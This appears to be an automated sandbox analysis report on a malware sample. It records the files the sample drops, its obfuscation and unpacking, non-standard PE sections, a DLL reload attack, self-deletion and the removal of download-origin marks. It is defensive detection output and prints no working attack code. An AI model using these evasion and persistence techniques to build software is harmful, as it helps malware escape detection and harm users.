Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Creates temporary files

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\21.tmp

Jump to behavior

SQL strings found in memory and binary data

Source: DF3A.exe.10.dr	Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: sqlite3.dll.35.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.35.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DF3A.exe.10.dr	Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: sqlite3.dll.35.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.35.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.35.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.35.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.35.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Local\Temp\B096.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Reads the hosts file

Source: C:\Users\user\AppData\Local\Temp\B096.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File read: C:\Windows\System32\drivers\etc\hosts

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Temp\B096.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

PE file contains a mix of data directories often seen in goodware

Source: Md0q201V1D.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Md0q201V1D.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Md0q201V1D.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Md0q201V1D.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Md0q201V1D.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Md0q201V1D.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

PE file contains a debug data directory

Source: Md0q201V1D.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\vojos\fuw.pdb source: CBF0.exe, 0000001D.00000002.451970656.0000000000417000.00000002.00020000.sdmp, bhhudtb.10.dr
Source:	Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: EBBE.exe.10.dr
Source:	Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: E64F.exe.10.dr
Source:	Binary string: dC:\fudijub.pdb` source: Md0q201V1D.exe
Source:	Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: E64F.exe.10.dr
Source:	Binary string: C:\lewusukoviv.pdb source: C8FE.exe.10.dr
Source:	Binary string: C:\yut\pabebanejupo12 f.pdb` source: C066.exe.10.dr
Source:	Binary string: C:\fudijub.pdb source: Md0q201V1D.exe
Source:	Binary string: wntdll.pdbUGP source: CBF0.exe, 0000001D.00000002.461326417.000000006B521000.00000020.00020000.sdmp, 1105.tmp.29.dr
Source:	Binary string: wntdll.pdb source: CBF0.exe, 1105.tmp.29.dr
Source:	Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: EBBE.exe.10.dr
Source:	Binary string: C:\tosofom\yopuk.pdb source: CAC5.exe.10.dr
Source:	Binary string: C:\lewusukoviv.pdb` source: C8FE.exe.10.dr
Source:	Binary string: C:\yut\pabebanejupo12 f.pdb source: C066.exe.10.dr
Source:	Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: C295.exe.10.dr
Source:	Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: F11E.exe.10.dr
Source:	Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: C295.exe.10.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Unpacked PE file: 29.2.CBF0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe	Unpacked PE file: 33.2.EBBE.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;

.NET source code contains potential unpacker

Source: CD17.exe.10.dr, SimplePaint/FrmMain.cs

.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\21.exe	Code function: 16_2_02D50F1A push ds; ret		16_2_02D50F27
Source: C:\Users\user\AppData\Roaming\gbhudtb	Code function: 23_2_02EB6552 push ds; ret		23_2_02EB655F
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Code function: 24_2_00A2D47C push esi; iretd		24_2_00A2D488
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402E54 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402E63 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402665 push cs; ret		29_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_0040290C push eax; iretd		29_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402E16 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402DC0 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402DD8 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402DE8 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402DF1 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402E82 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402E85 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402D92 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402E95 push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00401D9A pushad ; ret		29_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_00402E9C push eax; ret		29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	Code function: 29_2_6B59D0D1 push ecx; ret		29_2_6B59D0E4

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Md0q201V1D.exe

Code function: 0_2_00426B90 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00426B90

Binary contains a suspicious time stamp

Source: DEDC.exe.10.dr

Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]

PE file contains sections with non-standard names

Source: Md0q201V1D.exe	Static PE information: section name: .pale
Source: C066.exe.10.dr	Static PE information: section name: .ruxat
Source: 21.exe.10.dr	Static PE information: section name: .pale
Source: F1AC.exe.10.dr	Static PE information: section name: Cgw(O~.
Source: C295.exe.10.dr	Static PE information: section name: .vuci
Source: CAC5.exe.10.dr	Static PE information: section name: .xoj
Source: CBF0.exe.10.dr	Static PE information: section name: .cipizi

PE file contains an invalid checksum

Source: CD17.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x4147a
Source: BBE1.exe.10.dr	Static PE information: real checksum: 0x10f50 should be: 0x5be1
Source: F11E.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x114b9d
Source: DF3A.exe.10.dr	Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: DEDC.exe.10.dr	Static PE information: real checksum: 0x87179 should be: 0x81f2a
Source: B096.exe.10.dr	Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 6.98974133443
Source: initial sample	Static PE information: section name: .text entropy: 7.66210807275
Source: initial sample	Static PE information: section name: .text entropy: 7.66469899227
Source: initial sample	Static PE information: section name: .text entropy: 6.98974133443
Source: initial sample	Static PE information: section name: .text entropy: 7.86113394582
Source: initial sample	Static PE information: section name: .text entropy: 7.79620991915
Source: initial sample	Static PE information: section name: .text entropy: 7.83179260502
Source: initial sample	Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample	Static PE information: section name: .text entropy: 7.8779018043
Source: initial sample	Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample	Static PE information: section name: .text entropy: 6.97994250456
Source: initial sample	Static PE information: section name: .text entropy: 7.29655075024
Source: initial sample	Static PE information: section name: .text entropy: 7.86107035261

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\bhhudtb			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fehudtb			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\gbhudtb			Jump to dropped file

Drops PE files

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CBF0.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\gbhudtb			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C066.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe	File created: C:\Users\user\AppData\Local\Temp\1105.tmp			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\BBE1.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F11E.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F1AC.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C066.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CD17.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C295.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B096.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C8FE.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\DF3A.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\DEDC.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EBBE.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E64F.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D8D0.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\FD36.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\21.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CAC5.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\bhhudtb			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fehudtb			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

DLL reload attack detected

Source: C:\Users\user\AppData\Local\Temp\CBF0.exe

Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\md0q201v1d.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\gbhudtb:Zone.Identifier read attributes | delete

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B096.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
